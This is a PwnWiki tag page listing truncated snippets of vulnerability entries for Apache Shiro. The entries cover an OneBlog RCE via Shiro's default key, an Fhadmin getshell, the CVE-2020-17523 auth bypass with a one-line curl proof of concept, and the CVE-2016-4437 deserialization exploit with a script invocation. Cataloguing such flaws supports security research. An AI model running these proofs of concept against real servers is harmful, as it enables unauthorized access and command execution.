shiro | PwnWiki

OneBlog开源博客管理系统远程命令执行漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com , 漏洞利用由于使用含有漏洞版本的Apache Shiro和默认的密钥，导致OneBlog存在远程命令执行漏洞。 shiro 默认密钥： pwnwiki.com

阅读全文
Fhadmin Getshell漏洞

pwnwiki.com , FOFA icon_hash="-974263840" 漏洞利用这个框架是shiro的，密钥改了，但是没改验证绕过上传Shell：参考 https://forum.0-sec.org/t/topic/177 ...

阅读全文
CVE-2020-17523 Apache Shiro pathMatches 身份认证绕过漏洞/zh-tw

pwnwiki.com , 条件 Shiro with Spring /admin/space /admin/%20 POC curl -v http://Vimtim/admin/%20/ 免费、自由、人人可编辑的漏洞库--pwnwiki ...

阅读全文
CVE-2020-17523 Apache Shiro pathMatches 身份认证绕过漏洞

免费、自由、人人可编辑的漏洞库 , 条件 Shiro with Spring /admin/space /admin/%20 POC curl -v http://Vimtim/admin/%20/ pwnwiki.com

阅读全文
CVE-2016-4437 Shiro反序列化漏洞/zh-hans

pwnwiki.com , POC https://github.com/insightglacier/Shiro_exploit 漏洞利用 python3 shiro_exploit.py -t 3 -u http://192.168.2 ...

阅读全文
CVE-2016-4437 Shiro反序列化漏洞/ru

免费、自由、人人可编辑的漏洞库--pwnwiki.com , Contents 1 POC 2 Эксплуатация уязвимостей 3 Команда была выполнена успешно. 4 Getshell PO ...

阅读全文
CVE-2016-4437 Shiro反序列化漏洞/id

免费、自由、人人可编辑的漏洞库 , POC https://github.com/insightglacier/Shiro_exploit Eksploitasi python3 shiro_exploit.py -t 3 -u http: ...

阅读全文
CVE-2016-4437 Shiro反序列化漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com , POC https://github.com/insightglacier/Shiro_exploit 漏洞利用 python3 shiro_exploit.py -t 3 -u ...

阅读全文